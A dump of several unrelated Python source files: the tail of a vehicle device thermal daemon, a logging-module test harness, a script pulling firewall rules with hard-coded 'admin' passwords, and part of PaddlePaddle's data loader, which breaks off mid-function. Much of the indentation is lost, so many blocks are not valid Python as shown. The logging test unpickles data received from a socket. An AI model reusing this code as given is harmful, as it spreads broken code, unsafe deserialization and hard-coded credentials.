params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2004 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
#
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
"""
import select
import os, sys, string, struct, types, cPickle, cStringIO
import socket, threading, time
import logging, logging.handlers, logging.config
BANNER = "-- %-10s %-6s ---------------------------------------------------\n"
FINISH_UP = "Finish up, it's closing time. Messages should bear numbers 0 through 24."
#----------------------------------------------------------------------------
# Log receiver
#----------------------------------------------------------------------------
TIMEOUT = 10
from SocketServer import ThreadingTCPServer, StreamRequestHandler
class LogRecordStreamHandler(StreamRequestHandler):
"""
Handler for a streaming logging request. It basically logs the record
using whatever logging policy is configured locally.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while 1:
try:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
except:
raise
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
logname = "logrecv.tcp." + record.name
#If the end-of-messages sentinel is seen, tell the server to terminate
if record.msg == FINISH_UP:
self.server.abort = 1
record.msg = record.msg + " (via " + logname + ")"
logger = logging.getLogger(logname)
logger.handle(record)
# The server sets socketDataProcessed when it's done.
socketDataProcessed = threading.Event()
class LogRecordSocketReceiver(ThreadingTCPServer):
"""
A simple-minded TCP socket-based logging receiver suitable for test
purposes.
"""
allow_reuse_address = 1
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = 0
self.timeout = 1
def serve_until_stopped(self):
abort = 0
while not abort:
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.handle_request()
abort = self.abort
#notify the main thread that we're about to exit
socketDataProcessed.set()
def process_request(self, request, client_address):
#import threading
t = threading.Thread(target = self.finish_request,
args = (request, client_address))
t.start()
def runTCP(tcpserver):
tcpserver.serve_until_stopped()
#----------------------------------------------------------------------------
# Test 0
#----------------------------------------------------------------------------
msgcount = 0
def nextmessage():
global msgcount
rv = "Message %d" % msgcount
msgcount = msgcount + 1
return rv
def test0():
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
#These should log
ERR.log(logging.FATAL, nextmessage())
ERR.error(nextmessage())
INF.log(logging.FATAL, nextmessage())
INF.error(nextmessage())
INF.warn(nextmessage())
INF.info(nextmessage())
INF_UNDEF.log(logging.FATAL, nextmessage())
INF_UNDEF.error(nextmessage())
INF_UNDEF.warn (nextmessage())
INF_UNDEF.info (nextmessage())
INF_ERR.log(logging.FATAL, nextmessage())
INF_ERR.error(nextmessage())
INF_ERR_UNDEF.log(logging.FATAL, nextmessage())
INF_ERR_UNDEF.error(nextmessage())
DEB.log(logging.FATAL, nextmessage())
DEB.error(nextmessage())
DEB.warn (nextmessage())
DEB.info (nextmessage())
DEB.debug(nextmessage())
UNDEF.log(logging.FATAL, nextmessage())
UNDEF.error(nextmessage())
UNDEF.warn (nextmessage())
UNDEF.info (nextmessage())
GRANDCHILD.log(logging.FATAL, nextmessage())
CHILD.log(logging.FATAL, nextmessage())
#These should not log
ERR.warn(nextmessage())
ERR.info(nextmessage())
ERR.debug(nextmessage())
INF.debug(nextmessage())
INF_UNDEF.debug(nextmessage())
INF_ERR.warn(nextmessage())
INF_ERR.info(nextmessage())
INF_ERR.debug(nextmessage())
INF_ERR_UNDEF.warn(nextmessage())
INF_ERR_UNDEF.info(nextmessage())
INF_ERR_UNDEF.debug(nextmessage())
INF.info(FINISH_UP)
#----------------------------------------------------------------------------
# Test 1
#----------------------------------------------------------------------------
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 10
TACITURN = 9
TERSE = 8
EFFUSIVE = 7
SOCIABLE = 6
VERBOSE = 5
TALKATIVE = 4
GARRULOUS = 3
CHATTERBOX = 2
BORING = 1
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
#
# Now, to demonstrate filtering: suppose for some perverse reason we only
# want to print out all except GARRULOUS messages. Let's create a filter for
# this purpose...
#
class SpecificLevelFilter(logging.Filter):
def __init__(self, lvl):
self.level = lvl
def filter(self, record):
return self.level != record.levelno
class GarrulousFilter(SpecificLevelFilter):
def __init__(self):
SpecificLevelFilter.__init__(self, GARRULOUS)
#
# Now, let's demonstrate filtering at the logger. This time, use a filter
# which excludes SOCIABLE and TACITURN messages. Note that GARRULOUS events
# are still excluded.
#
class VerySpecificFilter(logging.Filter):
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
def message(s):
sys.stdout.write("%s\n" % s)
SHOULD1 = "This should only be seen at the '%s' logging level (or lower)"
def test1():
#
# Now, tell the logging system to associate names with our levels.
#
for lvl in my_logging_levels.keys():
logging.addLevelName(lvl, my_logging_levels[lvl])
#
# Now, define a test function which logs an event at each of our levels.
#
def doLog(log):
for lvl in LEVEL_RANGE:
log.log(lvl, SHOULD1, logging.getLevelName(lvl))
log = logging.getLogger("")
hdlr = log.handlers[0]
#
# Set the logging level to each different value and call the utility
# function to log events.
# In the output, you should see that each time round the loop, the number of
# logging events which are actually output decreases.
#
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
#
# Now, we demonstrate level filtering at the handler level. Tell the
# handler defined above to filter at level 'SOCIABLE', and repeat the
# above loop. Compare the output from the two runs.
#
hdlr.setLevel(SOCIABLE)
message("-- Filtering at handler level to SOCIABLE --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
hdlr.setLevel(0) #turn off level filtering at the handler
garr = GarrulousFilter()
hdlr.addFilter(garr)
message("-- Filtering using GARRULOUS filter --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
spec = VerySpecificFilter()
log.addFilter(spec)
message("-- Filtering using specific filter for SOCIABLE, TACITURN --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
log.removeFilter(spec)
hdlr.removeFilter(garr)
#Undo the one level which clashes...for regression tests
logging.addLevelName(logging.DEBUG, "DEBUG")
#----------------------------------------------------------------------------
# Test 2
#----------------------------------------------------------------------------
MSG = "-- logging %d at INFO, messages should be seen every 10 events --"
def test2():
logger = logging.getLogger("")
sh = logger.handlers[0]
sh.close()
logger.removeHandler(sh)
mh = logging.handlers.MemoryHandler(10,logging.WARNING, sh)
logger.setLevel(logging.DEBUG)
logger.addHandler(mh)
message("-- logging at DEBUG, nothing should be seen yet --")
logger.debug("Debug message")
message("-- logging at INFO, nothing should be seen yet --")
logger.info("Info message")
message("-- logging at WARNING, 3 messages should be seen --")
logger.warn("Warn message")
for i in xrange(102):
message(MSG % i)
logger.info("Info index = %d", i)
mh.close()
logger.removeHandler(mh)
logger.addHandler(sh)
#----------------------------------------------------------------------------
# Test 3
#----------------------------------------------------------------------------
FILTER = "a.b"
def doLog3():
logging.getLogger("a").info("Info 1")
logging.getLogger("a.b").info("Info 2")
logging.getLogger("a.c").info("Info 3")
logging.getLogger("a.b.c").info("Info 4")
logging.getLogger("a.b.c.d").info("Info 5")
logging.getLogger("a.bb.c").info("Info 6")
logging.getLogger("b").info("Info 7")
logging.getLogger("b.a").info("Info 8")
logging.getLogger("c.a.b").info("Info 9")
logging.getLogger("a.bb").info("Info 10")
def test3():
root = logging.getLogger()
root.setLevel(logging.DEBUG)
hand = root.handlers[0]
message("Unfiltered...")
doLog3()
message("Filtered with '%s'..." % FILTER)
filt = logging.Filter(FILTER)
hand.addFilter(filt)
doLog3()
hand.removeFilter(filt)
#----------------------------------------------------------------------------
# Test Harness
#----------------------------------------------------------------------------
def banner(nm, typ):
sep = BANNER % (nm, typ)
sys.stdout.write(sep)
sys.stdout.flush()
def test_main_inner():
rootLogger = logging.getLogger("")
rootLogger.setLevel(logging.DEBUG)
hdlr = logging.StreamHandler(sys.stdout)
fmt = logging.Formatter(logging.BASIC_FORMAT)
hdlr.setFormatter(fmt)
rootLogger.addHandler(hdlr)
#Set up a handler such that all events are sent via a socket to the log
#receiver (logrecv).
#The handler will only be added to the rootLogger for some of the tests
shdlr = logging.handlers.SocketHandler('localhost',
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
#Configure the logger for logrecv so events do not propagate beyond it.
#The sockLogger output is buffered in memory until the end of the test,
#and printed at the end.
sockOut = cStringIO.StringIO()
sockLogger = logging.getLogger("logrecv")
sockLogger.setLevel(logging.DEBUG)
sockhdlr = logging.StreamHandler(sockOut)
sockhdlr.setFormatter(logging.Formatter(
"%(name)s -> %(levelname)s: %(message)s"))
sockLogger.addHandler(sockhdlr)
sockLogger.propagate = 0
#Set up servers
threads = []
tcpserver = LogRecordSocketReceiver()
#sys.stdout.write("About to start TCP server...\n")
threads.append(threading.Thread(target=runTCP, args=(tcpserver,)))
for thread in threads:
thread.start()
try:
banner("log_test0", "begin")
rootLogger.addHandler(shdlr)
test0()
shdlr.close()
rootLogger.removeHandler(shdlr)
banner("log_test0", "end")
banner("log_test1", "begin")
test1()
banner("log_test1", "end")
banner("log_test2", "begin")
test2()
banner("log_test2", "end")
banner("log_test3", "begin")
test3()
banner("log_test3", "end")
finally:
#wait for TCP receiver to terminate
socketDataProcessed.wait()
for thread in threads:
thread.join()
banner("logrecv output", "begin")
sys.stdout.write(sockOut.getvalue())
sockOut.close()
sockLogger.removeHandler(sockhdlr)
sockhdlr.close()
banner("logrecv output", "end")
sys.stdout.flush()
try:
hdlr.close()
except:
pass
rootLogger.removeHandler(hdlr)
def test_main():
import locale
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first so we can restore it at the end.
try:
original_locale = locale.setlocale(locale.LC_ALL)
locale.setlocale(locale.LC_ALL, '')
except (ValueError, locale.Error):
# this happens on a Solaris box which only supports "C" locale
# or a Mac OS X box which supports very little locale stuff at all
original_locale = None
# Save and restore the original root logger level across the tests.
# Otherwise, e.g., if any test using cookielib runs after test_logging,
# cookielib's debug-level logger tries to log messages, leading to
# confusing:
# No handlers could be found for logger "cookielib"
# output while the tests are running.
root_logger = logging.getLogger("")
original_logging_level = root_logger.getEffectiveLevel()
try:
test_main_inner()
finally:
if original_locale is not None:
locale.setlocale(locale.LC_ALL, original_locale)
root_logger.setLevel(original_logging_level)
if __name__ == "__main__":
sys.stdout.write("test_logging\n")
test_main()
|
FMC_Initiator.py
|
import socket
import FMC
import ipaddress
from multiprocessing import Process
import time
nic_list = []
def get_nic_ip():
addrs = socket.getaddrinfo(socket.gethostname(), None)
    for addr in addrs:
        sockaddr = addr[4]  # (address, port, ...) tuple from getaddrinfo
        try:
            nic_list.append(ipaddress.IPv4Address(sockaddr[0]))
        except (TypeError, IndexError, ValueError):
            continue
return nic_list
# Credentials and the FMC address go in the function variables. Each username and password needs to be unique. Manual entry for now; a parameterised sketch follows the three functions below.
def initiate_1(ip):
net_loc = "1.1.1.1"
username = "admin1"
password = "admin"
initiate_1 = FMC.fmc()
initiate_1.username = username
initiate_1.password = password
initiate_1.net_loc = net_loc
initiate_1.query = "?offset=1&limit=25"
initiate_1.ip = ip
initiate_1.get_rules()
def initiate_2(ip):
net_loc = "1.1.1.1"
username = "admin2"
password = "admin"
initiate_2 = FMC.fmc()
initiate_2.username = username
initiate_2.password = password
initiate_2.net_loc = net_loc
initiate_2.query = "?offset=501&limit=25"
initiate_2.ip = ip
initiate_2.get_rules()
def initiate_3(ip):
net_loc = "1.1.1.1"
username = "admin3"
password = "admin"
initiate_3 = FMC.fmc()
initiate_3.username = username
initiate_3.password = password
initiate_3.net_loc = net_loc
initiate_3.query = "?offset=1001&limit=25"
initiate_3.ip = ip
initiate_3.get_rules()
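# A hedged sketch, not wired into the __main__ block below: the three
# initiate_* functions above differ only in their credentials and query
# offset, so they could be produced by one parameterised factory. The
# default net_loc and the limit of 25 mirror the hard-coded values above;
# the helper name itself is an assumption for illustration.
def make_initiator(username, password, offset, limit=25, net_loc="1.1.1.1"):
    def initiate(ip):
        session = FMC.fmc()
        session.username = username
        session.password = password
        session.net_loc = net_loc
        session.query = "?offset={}&limit={}".format(offset, limit)
        session.ip = ip
        session.get_rules()
    return initiate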
if __name__ == '__main__':
process_1 = Process(target=initiate_1, args=("YOUR IP HERE",)) # Your IP here
process_1.start()
time.sleep(10)
process_2 = Process(target=initiate_2, args=("YOUR IP HERE",)) # Your IP here
process_2.start()
time.sleep(10)
process_3 = Process(target=initiate_3, args=("YOUR IP HERE",)) # Your IP here
process_3.start()
stop = input("")
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
__all__ = ['get_worker_info']
# interval (in seconds) at which multi-process workers poll the indices
# queue, to avoid hanging in subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5
_IterableDatasetStopIteration = namedtuple('_IterableDatasetStopIteration',
['worker_id'])
def default_collate_fn(batch):
    """
    Default batch collating function for :code:`fluid.io.DataLoader`.
    The batch should be a list of samples, and each sample should be a list
    of fields as follows:
    [[field1, field2, ...], [field1, field2, ...], ...]
    This default collate function zips the fields of all samples together
    and stacks each field into a batch field as follows:
    [batch_field1, batch_field2, ...]
    Args:
        batch(list of list of numpy array): the batch data, each field
            should be a numpy array, each sample should be a list of
            fields, and the batch should be a list of samples.
    Returns:
        a list of numpy array: collated batch
    """
sample = batch[0]
# dataset has only 1 field
if isinstance(sample, np.ndarray):
return [np.stack(batch, axis=0)]
# batch each field
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
outputs = []
for slot in slots:
if isinstance(slot[0], (np.ndarray, np.bool, numbers.Number)):
tmp = np.stack(slot, axis=0)
outputs.append(tmp)
elif isinstance(slot[0], paddle.Tensor):
tmp = layers.stack(slot, axis=0)
outputs.append(tmp)
else:
raise RuntimeError("Unknown data type {}".format(type(slot[0])))
return outputs
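# Illustration only (never called by the DataLoader itself): a minimal sketch
# of what default_collate_fn does with a batch of two samples, each holding a
# feature array and a label. Field 0 of every sample is stacked into one
# array, field 1 into another, and so on.
def _default_collate_fn_example():
    batch = [
        [np.array([1.0, 2.0]), np.array(0)],  # sample 0: [feature, label]
        [np.array([3.0, 4.0]), np.array(1)],  # sample 1: [feature, label]
    ]
    features, labels = default_collate_fn(batch)
    # features.shape == (2, 2), labels.shape == (2,)
    return features, labels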
class _DatasetKind(object):
MAP = 0
ITER = 1
@staticmethod
def create_fetcher(kind, dataset, collate_fn, drop_last):
if kind == _DatasetKind.MAP:
return _MapDatasetFetcher(dataset, collate_fn, drop_last)
elif kind == _DatasetKind.ITER:
return _IterableDatasetFetcher(dataset, collate_fn, drop_last)
else:
raise NotImplementedError("unknown Dataset kind {}".format(kind))
class ParentWatchDog(object):
def __init__(self):
self._parent_pid = os.getppid()
self._parent_alive = True
def is_alive(self):
if self._parent_alive:
self._parent_alive = os.getppid() == self._parent_pid
return self._parent_alive
# worker information for each worker, used for splitting data copies
# for IterableDataset in worker processes.
_worker_info = None
def get_worker_info():
"""
Get DataLoader worker process information function, this function is
used to split data copy in worker process for IterableDataset
(see :code:`paddle.io.IterableDataset`), worker information contains
following fields:
:attr:`num_workers`: total worker process number, see `paddle.io.DataLoader`
    :attr:`id`: the worker process id, counted from 0 to :attr:`num_workers - 1`
:attr:`dataset`: the dataset object in this worker process
Returns:
WorkerInfo: an instance of WorkerInfo which contains fields above.
.. note::
        For more usage and examples, please see :code:`paddle.io.IterableDataset`
Example:
.. code-block:: python
import math
import numpy as np
import paddle.fluid as fluid
from paddle.io import IterableDataset, DataLoader, get_worker_info
class SplitedIterableDataset(IterableDataset):
def __init__(self, start, end):
self.start = start
self.end = end
def __iter__(self):
worker_info = get_worker_info()
if worker_info is None:
iter_start = self.start
iter_end = self.end
else:
per_worker = int(
math.ceil((self.end - self.start) / float(
worker_info.num_workers)))
worker_id = worker_info.id
iter_start = self.start + worker_id * per_worker
iter_end = min(iter_start + per_worker, self.end)
for i in range(iter_start, iter_end):
yield np.array([i])
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
dataset = SplitedIterableDataset(start=2, end=9)
dataloader = DataLoader(
dataset,
places=place,
num_workers=2,
batch_size=1,
drop_last=True)
print(list(dataloader))
# outputs: [2, 5, 3, 6, 4, 7]
"""
return _worker_info
class WorkerInfo(object):
__initialized = False
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.__initialized = True
def __setattr__(self, key, val):
if self.__initialized:
raise RuntimeError("Cannot assign attributes to {} objects".format(
self.__class__.__name__))
return super(WorkerInfo, self).__setattr__(key, val)
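# Illustration only: WorkerInfo freezes its attributes after construction, so
# worker code can read the shared description but cannot rewrite it. The
# field values below are made up for the example.
def _worker_info_example():
    info = WorkerInfo(id=0, num_workers=2, dataset=None)
    assert info.id == 0 and info.num_workers == 2
    try:
        info.id = 1  # any assignment after __init__ raises RuntimeError
    except RuntimeError:
        pass
    return info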
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
# LoDTensorBlockingQueue instance for create_py_reader and a thread
        # to put mini-batch data into self._blocking_queue, mini-batch data
        # will be fetched from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._collate_fn, True)
        # NOTE: len(self._places) batches are composed into one output
        # iteration, so the blocking_queue is sized to cache at most
        # 2 iterations worth of data here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
        # if there is only 1 place, there is no need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _thread_loop(self):
try:
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if not isinstance(slot, core.LoDTensor):
self._check_input_array(slot)
# FIXME(dkp): blocking_queue only support
# core.LoDTensorArray as input now, read
# numpy data into a LoDTensorArray here,
# should support paddle.Tensor list later
if isinstance(slot, paddle.Tensor):
slot = slot.numpy()
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
@classmethod
def _check_input_array(cls, item):
if isinstance(item, paddle.Tensor):
return
arr = np.array(item)
if arr.dtype == np.object:
            raise TypeError((
                "\n\tFailed to convert input data to a regular ndarray:\n\t* Usually "
                "this means the input data contains nested lists with different lengths. "
                "\n\t* Check the reader function passed to 'decorate_batch_generator'"
                " to locate the data that causes this issue.\n\t* Please consider using "
                "'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))
def __next__(self):
try:
if in_dygraph_mode():
return self._reader.read_next_var_list()
else:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._reader.reset()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
# NOTE(chenweihang): _worker_loop must be top level method to be pickled
def _worker_loop(dataset, dataset_kind, indices_queue, out_queue, done_event,
collate_fn, init_fn, worker_id, num_workers,
use_shared_memory):
try:
        # NOTE: [ mmap files clear ] When the child process exits unexpectedly,
        # some shared memory objects may have been allocated but not yet put
        # into the inter-process Queue. These objects need to be cleaned up
        # when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
# set signal handler
core._set_process_signal_handler()
global _worker_info
_worker_info = WorkerInfo(
id=worker_id, num_workers=num_workers, dataset=dataset)
init_exception = None
try:
if init_fn is not None:
init_fn(worker_id)
fetcher = _DatasetKind.create_fetcher(dataset_kind, dataset,
collate_fn, True)
except:
init_exception = Exception("init_fn failed in worker {}: " \
"{}".format(worker_id, sys.exc_info()))
iterator_drained = False
parent_watch_dog = ParentWatchDog()
while parent_watch_dog.is_alive():
try:
                data = indices_queue.get(timeout=MP_INDICES_CHECK_INTERVAL)
except queue.Empty:
continue
            # None as a poison pill, so the worker done event should already be set
if data is None:
assert done_event.is_set() or iterator_drained, \
"get None when worker done_event set"
break
            # If the worker done event is set but we still got data from
            # indices_queue, the remaining data should be fetched and skipped.
if done_event.is_set() or iterator_drained:
continue
idx, indices = data
try:
if init_exception is not None:
batch = init_exception
init_exception = None
else:
batch = fetcher.fetch(indices)
except Exception as e:
if isinstance(
e, StopIteration) and dataset_kind == _DatasetKind.ITER:
out_queue.put(_IterableDatasetStopIteration(worker_id))
iterator_drained = True
else:
out_queue.put((idx, e))
else:
if use_shared_memory:
